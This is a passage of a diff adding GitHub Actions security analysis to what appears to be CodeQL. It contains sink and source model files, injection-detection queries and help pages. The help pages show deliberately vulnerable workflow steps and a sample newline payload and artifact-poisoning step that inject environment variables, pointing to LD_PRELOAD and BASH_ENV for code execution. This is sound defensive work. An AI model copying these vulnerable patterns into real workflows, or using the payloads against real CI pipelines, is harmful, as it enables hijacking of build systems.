["tryghost/action-deploy-theme", "*", "input.theme-name", "command-injection", "manual"] + - ["tryghost/action-deploy-theme", "*", "input.exclude", "command-injection", "manual"] diff --git a/actions/ql/lib/ext/manual/tzkhan_pr-update-action.model.yml b/actions/ql/lib/ext/manual/tzkhan_pr-update-action.model.yml new file mode 100644 index 000000000000..5a226f121032 --- /dev/null +++ b/actions/ql/lib/ext/manual/tzkhan_pr-update-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSourceModel + data: + - ["tzkhan/pr-update-action", "*", "output.headMatch", "branch", "manual"] diff --git a/actions/ql/lib/ext/manual/veracode_veracode-sca.model.yml b/actions/ql/lib/ext/manual/veracode_veracode-sca.model.yml new file mode 100644 index 000000000000..d3e1daae67ac --- /dev/null +++ b/actions/ql/lib/ext/manual/veracode_veracode-sca.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["veracode/veracode-sca", "*", "input.url", "command-injection", "manual"] + - ["veracode/veracode-sca", "*", "input.path", "command-injection", "manual"] + - ["veracode/veracode-sca", "*", "input.skip-collectors", "command-injection", "manual"] + - ["veracode/veracode-sca", "*", "input.url", "command-injection", "manual"] diff --git a/actions/ql/lib/ext/manual/w3f_action-find-old-files.model.yml b/actions/ql/lib/ext/manual/w3f_action-find-old-files.model.yml new file mode 100644 index 000000000000..91a9ad11aa6d --- /dev/null +++ b/actions/ql/lib/ext/manual/w3f_action-find-old-files.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSourceModel + data: + # https://github.com/w3f/action-find-old-files + - ["w3f/action-find-old-files", "*", "output.files", "filename", "manual"] + diff --git a/actions/ql/lib/ext/manual/wearerequired_lint-action.model.yml b/actions/ql/lib/ext/manual/wearerequired_lint-action.model.yml new file mode 100644 index 000000000000..b1f8b91a22de --- /dev/null +++ b/actions/ql/lib/ext/manual/wearerequired_lint-action.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["wearerequired/lint-action", "*", "input.git_name", "command-injection", "manual"] + - ["wearerequired/lint-action", "*", "input.git_email", "command-injection", "manual"] + - ["wearerequired/lint-action", "*", "input.commit_message", "command-injection", "manual"] diff --git a/actions/ql/lib/ext/manual/webfactory_ssh-agent.model.yml b/actions/ql/lib/ext/manual/webfactory_ssh-agent.model.yml new file mode 100644 index 000000000000..48b11c1c5b20 --- /dev/null +++ b/actions/ql/lib/ext/manual/webfactory_ssh-agent.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["webfactory/ssh-agent", "*", "input.ssh-agent-cmd", "command-injection", "manual"] + - ["webfactory/ssh-agent", "*", "input.ssh-add-cmd", "command-injection", "manual"] + - ["webfactory/ssh-agent", "*", "input.git-cmd", "command-injection", "manual"] diff --git a/actions/ql/lib/ext/manual/xom9ikk_dotenv.model.yml b/actions/ql/lib/ext/manual/xom9ikk_dotenv.model.yml new file mode 100644 index 000000000000..1ed8c0fd3f7c --- /dev/null +++ b/actions/ql/lib/ext/manual/xom9ikk_dotenv.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["xom9ikk/dotenv", "*", "artifact", "envvar-injection", "manual"] diff --git a/actions/ql/lib/ext/manual/xt0rted_pull-request-comment-branch.model.yml b/actions/ql/lib/ext/manual/xt0rted_pull-request-comment-branch.model.yml new file mode 100644 index 000000000000..bfbd1dd12e6e --- /dev/null +++ b/actions/ql/lib/ext/manual/xt0rted_pull-request-comment-branch.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSourceModel + data: + - ["xt0rted/pull-request-comment-branch", "*", "output.head_ref", "branch", "manual"] + diff --git a/actions/ql/lib/ext/manual/yumemi-inc_changed-files.model.yml b/actions/ql/lib/ext/manual/yumemi-inc_changed-files.model.yml new file mode 100644 index 000000000000..db61e9171a87 --- /dev/null +++ b/actions/ql/lib/ext/manual/yumemi-inc_changed-files.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSourceModel + data: + # https://github.com/yumemi-inc/changed-files + - ["yumemi-inc/changed-files", "*", "output.files", "filename", "manual"] + + diff --git a/actions/ql/lib/ext/manual/zaproxy_action-baseline.model.yml b/actions/ql/lib/ext/manual/zaproxy_action-baseline.model.yml new file mode 100644 index 000000000000..309045ee58dc --- /dev/null +++ b/actions/ql/lib/ext/manual/zaproxy_action-baseline.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["zaproxy/action-baseline", "*", "input.docker_name", "command-injection", "manual"] + - ["zaproxy/action-baseline", "*", "input.target", "command-injection", "manual"] + - ["zaproxy/action-baseline", "*", "input.rules_file_name", "command-injection", "manual"] + - ["zaproxy/action-baseline", "*", "input.cmd_options", "command-injection", "manual"] \ No newline at end of file diff --git a/actions/ql/lib/ext/manual/zaproxy_action-full-scan.model.yml b/actions/ql/lib/ext/manual/zaproxy_action-full-scan.model.yml new file mode 100644 index 000000000000..9da3749ebe45 --- /dev/null +++ b/actions/ql/lib/ext/manual/zaproxy_action-full-scan.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["zaproxy/action-full-scan", "*", "input.docker_name", "command-injection", "manual"] + - ["zaproxy/action-full-scan", "*", "input.target", "command-injection", "manual"] + - ["zaproxy/action-full-scan", "*", "input.rules_file_name", "command-injection", "manual"] + - ["zaproxy/action-full-scan", "*", "input.cmd_options", "command-injection", "manual"] diff --git a/actions/ql/lib/ext/manual/zentered_issue-forms-body-parser.model.yml b/actions/ql/lib/ext/manual/zentered_issue-forms-body-parser.model.yml new file mode 100644 index 000000000000..0cce7cc0cff7 --- /dev/null +++ b/actions/ql/lib/ext/manual/zentered_issue-forms-body-parser.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["zentered/issue-forms-body-parser", "*", "input.body", "output.data", "taint", "manual"] diff --git a/actions/ql/lib/ide-contextual-queries/printAst.ql b/actions/ql/lib/ide-contextual-queries/printAst.ql new file mode 100644 index 000000000000..450f4446e361 --- /dev/null +++ b/actions/ql/lib/ide-contextual-queries/printAst.ql @@ -0,0 +1,28 @@ +/** + * @name Print AST + * @description Produces a representation of a file's Abstract Syntax Tree. + * This query is used by the VS Code extension. + * @id actions/print-ast + * @kind graph + * @tags ide-contextual-queries/print-ast + */ + +private import codeql.actions.ideContextual.IDEContextual +import codeql.actions.ideContextual.printAst +private import codeql.actions.Ast + +/** + * The source file to generate an AST from. + */ +external string selectedSourceFile(); + +/** + * A configuration that only prints nodes in the selected source file. + */ +class Cfg extends PrintAstConfiguration { + override predicate shouldPrintNode(PrintAstNode n) { + super.shouldPrintNode(n) and + n instanceof PrintRegularAstNode and + n.getLocation().getFile() = getFileBySourceArchiveName(selectedSourceFile()) + } +} diff --git a/actions/ql/lib/qlpack.yml b/actions/ql/lib/qlpack.yml index 4f674220c885..83cdaabc80dd 100644 --- a/actions/ql/lib/qlpack.yml +++ b/actions/ql/lib/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/actions-all -version: 0.0.1-dev +version: 0.4.0-dev library: true warnOnImplicitThis: true dependencies: @@ -10,3 +10,7 @@ dependencies: codeql/javascript-all: ${workspace} extractor: actions groups: actions +dataExtensions: + - ext/manual/*.model.yml + - ext/generated/**/*.model.yml + - ext/config/*.yml diff --git a/actions/ql/src/Debug/SyntaxError.ql b/actions/ql/src/Debug/SyntaxError.ql new file mode 100644 index 000000000000..9a638ad7fbe2 --- /dev/null +++ b/actions/ql/src/Debug/SyntaxError.ql @@ -0,0 +1,17 @@ +/** + * @name Syntax error + * @description A piece of code could not be parsed due to syntax errors. + * @kind problem + * @problem.severity recommendation + * @id actions/syntax-error + * @tags reliability + * correctness + * language-features + * debug + * @precision very-high + */ + +private import codeql.actions.ast.internal.Yaml + +from YamlParseError pe +select pe, pe.getMessage() diff --git a/actions/ql/src/Debug/partial.ql b/actions/ql/src/Debug/partial.ql new file mode 100644 index 000000000000..cb8ba7873d8c --- /dev/null +++ b/actions/ql/src/Debug/partial.ql @@ -0,0 +1,36 @@ +/** + * @name Forward Partial Dataflow + * @description Forward Partial Dataflow + * @kind path-problem + * @precision low + * @problem.severity error + * @id actions/test-dataflow + * @tags actions + * debug + */ + +import actions +import codeql.actions.DataFlow +import codeql.actions.TaintTracking +import codeql.actions.dataflow.FlowSources +import PartialFlow::PartialPathGraph + +private module MyConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { + source instanceof RemoteFlowSource and + source.getLocation().getFile().getBaseName() = "non-existant-test.yml" + } + + predicate isSink(DataFlow::Node sink) { none() } +} + +private module MyFlow = TaintTracking::Global; // or DataFlow::Global<..> + +int explorationLimit() { result = 10 } + +private module PartialFlow = MyFlow::FlowExplorationFwd; + +from PartialFlow::PartialPathNode source, PartialFlow::PartialPathNode sink +where PartialFlow::partialFlow(source, sink, _) +select sink.getNode(), source, sink, "This node receives taint from $@.", source.getNode(), + "this source" diff --git a/actions/ql/src/Models/CompositeActionsSinks.ql b/actions/ql/src/Models/CompositeActionsSinks.ql new file mode 100644 index 000000000000..b5ce78fe062a --- /dev/null +++ b/actions/ql/src/Models/CompositeActionsSinks.ql @@ -0,0 +1,37 @@ +/** + * @name Composite Action Sinks + * @description Actions passing input variables to expression injection sinks. + * @kind path-problem + * @problem.severity warning + * @security-severity 9.3 + * @precision high + * @id actions/composite-action-sinks + * @tags actions + * model-generator + * external/cwe/cwe-020 + */ + +import actions +import codeql.actions.security.CodeInjectionQuery +import codeql.actions.TaintTracking +import codeql.actions.dataflow.ExternalFlow + +private module MyConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { + exists(CompositeAction c | c.getAnInput() = source.asExpr()) + } + + predicate isSink(DataFlow::Node sink) { + sink instanceof CodeInjectionSink and not madSink(sink, "code-injection") + } +} + +module MyFlow = TaintTracking::Global; + +import MyFlow::PathGraph + +from MyFlow::PathNode source, MyFlow::PathNode sink +where + MyFlow::flowPath(source, sink) and + source.getNode().getLocation().getFile() = sink.getNode().getLocation().getFile() +select sink.getNode(), source, sink, "Sink" diff --git a/actions/ql/src/Models/CompositeActionsSources.ql b/actions/ql/src/Models/CompositeActionsSources.ql new file mode 100644 index 000000000000..8e4275f27c7d --- /dev/null +++ b/actions/ql/src/Models/CompositeActionsSources.ql @@ -0,0 +1,47 @@ +/** + * @name Composite Action Sources + * @description Actions that pass user-controlled data to their output variables. + * @kind path-problem + * @problem.severity warning + * @security-severity 9.3 + * @precision high + * @id actions/composite-action-sources + * @tags actions + * model-generator + * external/cwe/cwe-020 + */ + +import actions +import codeql.actions.DataFlow +import codeql.actions.TaintTracking +import codeql.actions.dataflow.FlowSources +import codeql.actions.dataflow.ExternalFlow + +private module MyConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { + source instanceof RemoteFlowSource and + not source instanceof DataFlow::ParameterNode and + exists(CompositeAction c | c.getAChildNode*() = source.asExpr()) + } + + predicate isSink(DataFlow::Node sink) { + exists(CompositeAction c | c.getAnOutputExpr() = sink.asExpr()) + } + + predicate allowImplicitRead(DataFlow::Node node, DataFlow::ContentSet set) { + allowImplicitRead(node, set) + or + isSink(node) and + set instanceof DataFlow::FieldContent + } +} + +module MyFlow = TaintTracking::Global; + +import MyFlow::PathGraph + +from MyFlow::PathNode source, MyFlow::PathNode sink +where + MyFlow::flowPath(source, sink) and + source.getNode().getLocation().getFile() = sink.getNode().getLocation().getFile() +select sink.getNode(), source, sink, "Source" diff --git a/actions/ql/src/Models/CompositeActionsSummaries.ql b/actions/ql/src/Models/CompositeActionsSummaries.ql new file mode 100644 index 000000000000..8b8b5af3c459 --- /dev/null +++ b/actions/ql/src/Models/CompositeActionsSummaries.ql @@ -0,0 +1,38 @@ +/** + * @name Composite Action Summaries + * @description Actions that pass user-controlled data to their output variables. + * @kind path-problem + * @problem.severity warning + * @security-severity 9.3 + * @precision high + * @id actions/composite-action-summaries + * @tags actions + * model-generator + * external/cwe/cwe-020 + */ + +import actions +import codeql.actions.DataFlow +import codeql.actions.TaintTracking +import codeql.actions.dataflow.FlowSources +import codeql.actions.dataflow.ExternalFlow + +private module MyConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { + exists(CompositeAction c | c.getAnInput() = source.asExpr()) + } + + predicate isSink(DataFlow::Node sink) { + exists(CompositeAction c | c.getAnOutputExpr() = sink.asExpr()) + } +} + +module MyFlow = TaintTracking::Global; + +import MyFlow::PathGraph + +from MyFlow::PathNode source, MyFlow::PathNode sink +where + MyFlow::flowPath(source, sink) and + source.getNode().getLocation().getFile() = sink.getNode().getLocation().getFile() +select sink.getNode(), source, sink, "Summary" diff --git a/actions/ql/src/Models/ReusableWorkflowsSinks.ql b/actions/ql/src/Models/ReusableWorkflowsSinks.ql new file mode 100644 index 000000000000..6da9acda9060 --- /dev/null +++ b/actions/ql/src/Models/ReusableWorkflowsSinks.ql @@ -0,0 +1,37 @@ +/** + * @name Reusable Workflow Sinks + * @description Reusable Workflows passing parameters to an expression injection sink. + * @kind path-problem + * @problem.severity warning + * @security-severity 9.3 + * @precision high + * @id actions/reusable-wokflow-sinks + * @tags actions + * model-generator + * external/cwe/cwe-020 + */ + +import actions +import codeql.actions.security.CodeInjectionQuery +import codeql.actions.TaintTracking +import codeql.actions.dataflow.ExternalFlow + +private module MyConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { + exists(ReusableWorkflow w | w.getAnInput() = source.asExpr()) + } + + predicate isSink(DataFlow::Node sink) { + sink instanceof CodeInjectionSink and not madSink(sink, "code-injection") + } +} + +module MyFlow = TaintTracking::Global; + +import MyFlow::PathGraph + +from MyFlow::PathNode source, MyFlow::PathNode sink +where + MyFlow::flowPath(source, sink) and + source.getNode().getLocation().getFile() = sink.getNode().getLocation().getFile() +select sink.getNode(), source, sink, "Sink" diff --git a/actions/ql/src/Models/ReusableWorkflowsSources.ql b/actions/ql/src/Models/ReusableWorkflowsSources.ql new file mode 100644 index 000000000000..e5612d063432 --- /dev/null +++ b/actions/ql/src/Models/ReusableWorkflowsSources.ql @@ -0,0 +1,47 @@ +/** + * @name Reusable Workflow Sources + * @description Reusable Workflow that pass user-controlled data to their output variables. + * @kind path-problem + * @problem.severity warning + * @security-severity 9.3 + * @precision high + * @id actions/reusable-workflow-sources + * @tags actions + * model-generator + * external/cwe/cwe-020 + */ + +import actions +import codeql.actions.DataFlow +import codeql.actions.TaintTracking +import codeql.actions.dataflow.FlowSources +import codeql.actions.dataflow.ExternalFlow + +private module MyConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { + source instanceof RemoteFlowSource and + not source instanceof DataFlow::ParameterNode and + exists(ReusableWorkflow w | w.getAChildNode*() = source.asExpr()) + } + + predicate isSink(DataFlow::Node sink) { + exists(ReusableWorkflow w | w.getAnOutputExpr() = sink.asExpr()) + } + + predicate allowImplicitRead(DataFlow::Node node, DataFlow::ContentSet set) { + allowImplicitRead(node, set) + or + isSink(node) and + set instanceof DataFlow::FieldContent + } +} + +module MyFlow = TaintTracking::Global; + +import MyFlow::PathGraph + +from MyFlow::PathNode source, MyFlow::PathNode sink +where + MyFlow::flowPath(source, sink) and + source.getNode().getLocation().getFile() = sink.getNode().getLocation().getFile() +select sink.getNode(), source, sink, "Source" diff --git a/actions/ql/src/Models/ReusableWorkflowsSummaries.ql b/actions/ql/src/Models/ReusableWorkflowsSummaries.ql new file mode 100644 index 000000000000..444ce028954e --- /dev/null +++ b/actions/ql/src/Models/ReusableWorkflowsSummaries.ql @@ -0,0 +1,38 @@ +/** + * @name Reusable Workflows Summaries + * @description Reusable workflow that pass user-controlled data to their output variables. + * @kind path-problem + * @problem.severity warning + * @security-severity 9.3 + * @precision high + * @id actions/reusable-workflow-summaries + * @tags actions + * model-generator + * external/cwe/cwe-020 + */ + +import actions +import codeql.actions.DataFlow +import codeql.actions.TaintTracking +import codeql.actions.dataflow.FlowSources +import codeql.actions.dataflow.ExternalFlow + +private module MyConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { + exists(ReusableWorkflow w | w.getAnInput() = source.asExpr()) + } + + predicate isSink(DataFlow::Node sink) { + exists(ReusableWorkflow w | w.getAnOutputExpr() = sink.asExpr()) + } +} + +module MyFlow = TaintTracking::Global; + +import MyFlow::PathGraph + +from MyFlow::PathNode source, MyFlow::PathNode sink +where + MyFlow::flowPath(source, sink) and + source.getNode().getLocation().getFile() = sink.getNode().getLocation().getFile() +select sink.getNode(), source, sink, "Summary" diff --git a/actions/ql/src/Placeholder.ql b/actions/ql/src/Placeholder.ql deleted file mode 100644 index 63e32f04dfb3..000000000000 --- a/actions/ql/src/Placeholder.ql +++ /dev/null @@ -1,16 +0,0 @@ -/** - * @name Placeholder Query - * @description Placeholder - * @kind problem - * @problem.severity warning - * @security-severity 9.3 - * @precision high - * @id actions/placeholder - * @tags actions security - */ - -import actions -import javascript - -from File f -select f, "Analyzed a file." diff --git a/actions/ql/src/Security/CWE-074/OutputClobberingHigh.ql b/actions/ql/src/Security/CWE-074/OutputClobberingHigh.ql new file mode 100644 index 000000000000..9c9c2e4d139a --- /dev/null +++ b/actions/ql/src/Security/CWE-074/OutputClobberingHigh.ql @@ -0,0 +1,44 @@ +/** + * @name Output Clobbering + * @description A Step output can be clobbered which may allow an attacker to manipulate the expected and trusted values of a variable. + * @kind path-problem + * @problem.severity error + * @security-severity 7.3 + * @precision high + * @id actions/output-clobbering/high + * @tags actions + * security + * experimental + * external/cwe/cwe-074 + */ + +import actions +import codeql.actions.security.OutputClobberingQuery +import codeql.actions.dataflow.ExternalFlow +import codeql.actions.dataflow.FlowSources +import OutputClobberingFlow::PathGraph +import codeql.actions.security.ControlChecks + +from OutputClobberingFlow::PathNode source, OutputClobberingFlow::PathNode sink, Event event +where + OutputClobberingFlow::flowPath(source, sink) and + inPrivilegedContext(sink.getNode().asExpr(), event) and + // exclude paths to file read sinks from non-artifact sources + ( + not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and + not exists(ControlCheck check | + check.protects(sink.getNode().asExpr(), event, "code-injection") + ) + or + source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and + not exists(ControlCheck check | + check.protects(sink.getNode().asExpr(), event, ["untrusted-checkout", "artifact-poisoning"]) + ) and + ( + sink.getNode() instanceof OutputClobberingFromFileReadSink or + sink.getNode() instanceof WorkflowCommandClobberingFromFileReadSink or + madSink(sink.getNode(), "output-clobbering") + ) + ) +select sink.getNode(), source, sink, "Potential clobbering of a step output in $@.", sink, + sink.getNode().toString() diff --git a/actions/ql/src/Security/CWE-077/EnvPathInjectionCritical.md b/actions/ql/src/Security/CWE-077/EnvPathInjectionCritical.md new file mode 100644 index 000000000000..36622d127d80 --- /dev/null +++ b/actions/ql/src/Security/CWE-077/EnvPathInjectionCritical.md @@ -0,0 +1,39 @@ +# Environment Path Injection + +## Description + +GitHub Actions allow to define the system PATH variable by writing to a file pointed to by the `GITHUB_PATH` environment variable. Writing to this file appends a directory to the system PATH variable and automatically makes it available to all subsequent actions in the current job. + +E.g.: + +```bash +echo "$HOME/.local/bin" >> $GITHUB_PATH +``` + +If an attacker can control the contents of the system PATH, they are able to influence what commands are run in subsequent steps of the same job. + +## Recommendations + +Do not allow untrusted data to influence the system PATH: Avoid using untrusted data sources (e.g., artifact content) to define the system PATH. + +## Examples + +### Incorrect Usage + +Consider the following basic setup where an environment variable `PATH` is set: + +```yaml +steps: + - name: Set the path + env: + BODY: ${{ github.event.comment.body }} + run: | + PATH=$(echo "$BODY" | grep -oP 'system path: \K\S+') + echo "$PATH" >> "$GITHUB_PATH" +``` + +If an attacker can manipulate the value being set, such as through artifact downloads or user inputs, they can potentially change the system PATH and get arbitrary command execution in subsequent steps. + +## References + +- [Workflow commands for GitHub Actions](https://docs.github.com/en/actions/writing-workflows/choosing-what-your-workflow-does/workflow-commands-for-github-actions) diff --git a/actions/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql b/actions/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql new file mode 100644 index 000000000000..3bb1558788a6 --- /dev/null +++ b/actions/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql @@ -0,0 +1,39 @@ +/** + * @name PATH Enviroment Variable built from user-controlled sources + * @description Building the PATH environment variable from user-controlled sources may alter the execution of following system commands + * @kind path-problem + * @problem.severity error + * @security-severity 9 + * @precision very-high + * @id actions/envpath-injection/critical + * @tags actions + * security + * external/cwe/cwe-077 + * external/cwe/cwe-020 + */ + +import actions +import codeql.actions.security.EnvPathInjectionQuery +import EnvPathInjectionFlow::PathGraph +import codeql.actions.dataflow.FlowSources +import codeql.actions.security.ControlChecks + +from EnvPathInjectionFlow::PathNode source, EnvPathInjectionFlow::PathNode sink, Event event +where + EnvPathInjectionFlow::flowPath(source, sink) and + inPrivilegedContext(sink.getNode().asExpr(), event) and + ( + not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and + not exists(ControlCheck check | + check.protects(sink.getNode().asExpr(), event, "code-injection") + ) + or + source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and + not exists(ControlCheck check | + check.protects(sink.getNode().asExpr(), event, ["untrusted-checkout", "artifact-poisoning"]) + ) and + sink.getNode() instanceof EnvPathInjectionFromFileReadSink + ) +select sink.getNode(), source, sink, + "Potential PATH environment variable injection in $@, which may be controlled by an external user ($@).", + sink, sink.getNode().toString(), event, event.getName() diff --git a/actions/ql/src/Security/CWE-077/EnvPathInjectionMedium.md b/actions/ql/src/Security/CWE-077/EnvPathInjectionMedium.md new file mode 100644 index 000000000000..36622d127d80 --- /dev/null +++ b/actions/ql/src/Security/CWE-077/EnvPathInjectionMedium.md @@ -0,0 +1,39 @@ +# Environment Path Injection + +## Description + +GitHub Actions allow to define the system PATH variable by writing to a file pointed to by the `GITHUB_PATH` environment variable. Writing to this file appends a directory to the system PATH variable and automatically makes it available to all subsequent actions in the current job. + +E.g.: + +```bash +echo "$HOME/.local/bin" >> $GITHUB_PATH +``` + +If an attacker can control the contents of the system PATH, they are able to influence what commands are run in subsequent steps of the same job. + +## Recommendations + +Do not allow untrusted data to influence the system PATH: Avoid using untrusted data sources (e.g., artifact content) to define the system PATH. + +## Examples + +### Incorrect Usage + +Consider the following basic setup where an environment variable `PATH` is set: + +```yaml +steps: + - name: Set the path + env: + BODY: ${{ github.event.comment.body }} + run: | + PATH=$(echo "$BODY" | grep -oP 'system path: \K\S+') + echo "$PATH" >> "$GITHUB_PATH" +``` + +If an attacker can manipulate the value being set, such as through artifact downloads or user inputs, they can potentially change the system PATH and get arbitrary command execution in subsequent steps. + +## References + +- [Workflow commands for GitHub Actions](https://docs.github.com/en/actions/writing-workflows/choosing-what-your-workflow-does/workflow-commands-for-github-actions) diff --git a/actions/ql/src/Security/CWE-077/EnvPathInjectionMedium.ql b/actions/ql/src/Security/CWE-077/EnvPathInjectionMedium.ql new file mode 100644 index 000000000000..a1499764ef36 --- /dev/null +++ b/actions/ql/src/Security/CWE-077/EnvPathInjectionMedium.ql @@ -0,0 +1,32 @@ +/** + * @name PATH Enviroment Variable built from user-controlled sources + * @description Building the PATH environment variable from user-controlled sources may alter the execution of following system commands + * @kind path-problem + * @problem.severity warning + * @security-severity 5.0 + * @precision high + * @id actions/envpath-injection/medium + * @tags actions + * security + * external/cwe/cwe-077 + * external/cwe/cwe-020 + */ + +import actions +import codeql.actions.security.EnvPathInjectionQuery +import codeql.actions.dataflow.FlowSources +import EnvPathInjectionFlow::PathGraph + +from EnvPathInjectionFlow::PathNode source, EnvPathInjectionFlow::PathNode sink +where + EnvPathInjectionFlow::flowPath(source, sink) and + inNonPrivilegedContext(sink.getNode().asExpr()) and + ( + not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" + or + source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and + sink.getNode() instanceof EnvPathInjectionFromFileReadSink + ) +select sink.getNode(), source, sink, + "Potential PATH environment variable injection in $@, which may be controlled by an external user.", + sink, sink.getNode().toString() diff --git a/actions/ql/src/Security/CWE-077/EnvVarInjectionCritical.md b/actions/ql/src/Security/CWE-077/EnvVarInjectionCritical.md new file mode 100644 index 000000000000..cc35402b804d --- /dev/null +++ b/actions/ql/src/Security/CWE-077/EnvVarInjectionCritical.md @@ -0,0 +1,117 @@ +# Environment Variable Injection + +## Description + +GitHub Actions allow to define environment variables by writing to a file pointed to by the `GITHUB_ENV` environment variable: + +This file contains lines in the `KEY=VALUE` format: + +```bash +steps: + - name: Set the value + id: step_one + run: | + echo "action_state=yellow" >> "$GITHUB_ENV" +``` + +It is also possible to define multiline variables by using the [following construct](https://en.wikipedia.org/wiki/Here_document): + +``` +KEY<<{delimiter} +VALUE +VALUE +{delimiter} +``` + +```bash +steps: + - name: Set the value in bash + id: step_one + run: | + { + echo 'JSON_RESPONSE<> "$GITHUB_ENV" +``` + +If an attacker can control the values assigned to environment variables and there is no sanitization in place, the attacker will be able to inject additional variables by injecting new lines or `{delimiters}`. + +## Recommendations + +1. **Do not allow untrusted data to influence environment variables**: + + - Avoid using untrusted data sources (e.g., artifact content) to define environment variables. + - Validate and sanitize all inputs before using them in environment settings. + +2. **Do not allow new lines when defining single line environment variables**: + + - `echo "BODY=$(echo "$BODY" | tr -d '\n')" >> "$GITHUB_ENV"` + +3. **Use unique identifiers when defining multi line environment variables**: + + ```bash + steps: + - name: Set the value in bash + id: step_one + run: | + # Generate a UUID + UUID=$(uuidgen) + { + echo "JSON_RESPONSE<> "$GITHUB_ENV" + ``` + +## Examples + +### Example of Vulnerability + +Consider the following basic setup where an environment variable `MYVAR` is set and used in subsequent steps: + +```yaml +steps: + - name: Set the value + id: step_one + env: + BODY: ${{ github.event.comment.body }} + run: | + REPLACED=$(echo "$BODY" | sed 's/FOO/BAR/g') + echo "MYVAR=$REPLACED" >> "$GITHUB_ENV" +``` + +If an attacker can manipulate the value being set, such as through artifact downloads or user inputs, the attacker can potentially inject new environment variables. For example, they could write an issue comment like: + +```text +FOO +NEW_ENV_VAR=MALICIOUS_VALUE +``` + +Likewise, if the attacker controls a file in the GitHub Actions Runner's workspace (eg: the workflow checkouts untrusted code or downloads an untrusted artifact) and the contents of that file are assigned to an environment variable such as: + +```bash +- run: | + PR_NUMBER=$(cat pr-number.txt) + echo "PR_NUMBER=$PR_NUMBER" >> $GITHUB_ENV +``` + +An attacker could craft a malicious artifact that writes dangerous environment variables: + +```bash + - run: | + echo -e "666\nNEW_ENV_VAR=MALICIOUS_VALUE" > pr-number.txt + - uses: actions/upload-artifact@v4 + with: + name: pr-number + path: ./pr-number.txt +``` + +### Exploitation + +An attacker is be able to run arbitrary code by injecting environment variables such as `LD_PRELOAD`, `BASH_ENV`, etc. + +## References + +- [Workflow commands for GitHub Actions](https://docs.github.com/en/actions/writing-workflows/choosing-what-your-workflow-does/workflow-commands-for-github-actions) +- [GitHub Actions Exploitation: Repo Jacking and Environment Manipulation](https://www.synacktiv.com/publications/github-actions-exploitation-repo-jacking-and-environment-manipulation) diff --git a/actions/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql b/actions/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql new file mode 100644 index 000000000000..13086c630808 --- /dev/null +++ b/actions/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql @@ -0,0 +1,48 @@ +/** + * @name Enviroment Variable built from user-controlled sources + * @description Building an environment variable from user-controlled sources may alter the execution of following system commands + * @kind path-problem + * @problem.severity error + * @security-severity 9 + * @precision very-high + * @id actions/envvar-injection/critical + * @tags actions + * security + * external/cwe/cwe-077 + * external/cwe/cwe-020 + */ + +import actions +import codeql.actions.security.EnvVarInjectionQuery +import codeql.actions.dataflow.ExternalFlow +import codeql.actions.dataflow.FlowSources +import EnvVarInjectionFlow::PathGraph +import codeql.actions.security.ControlChecks + +from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink, Event event +where + EnvVarInjectionFlow::flowPath(source, sink) and + inPrivilegedContext(sink.getNode().asExpr(), event) and + // exclude paths to file read sinks from non-artifact sources + ( + // source is text + not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and + not exists(ControlCheck check | + check.protects(sink.getNode().asExpr(), event, ["envvar-injection", "code-injection"]) + ) + or + // source is an artifact or a file from an untrusted checkout + source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and + not exists(ControlCheck check | + check + .protects(sink.getNode().asExpr(), event, + ["envvar-injection", "untrusted-checkout", "artifact-poisoning"]) + ) and + ( + sink.getNode() instanceof EnvVarInjectionFromFileReadSink or + madSink(sink.getNode(), "envvar-injection") + ) + ) +select sink.getNode(), source, sink, + "Potential environment variable injection in $@, which may be controlled by an external user ($@).", + sink, sink.getNode().toString(), event, event.getName() diff --git a/actions/ql/src/Security/CWE-077/EnvVarInjectionMedium.md b/actions/ql/src/Security/CWE-077/EnvVarInjectionMedium.md new file mode 100644 index 000000000000..cc35402b804d --- /dev/null +++ b/actions/ql/src/Security/CWE-077/EnvVarInjectionMedium.md @@ -0,0 +1,117 @@ +# Environment Variable Injection + +## Description + +GitHub Actions allow to define environment variables by writing to a file pointed to by the `GITHUB_ENV` environment variable: + +This file contains lines in the `KEY=VALUE` format: + +```bash +steps: + - name: Set the value + id: step_one + run: | + echo "action_state=yellow" >> 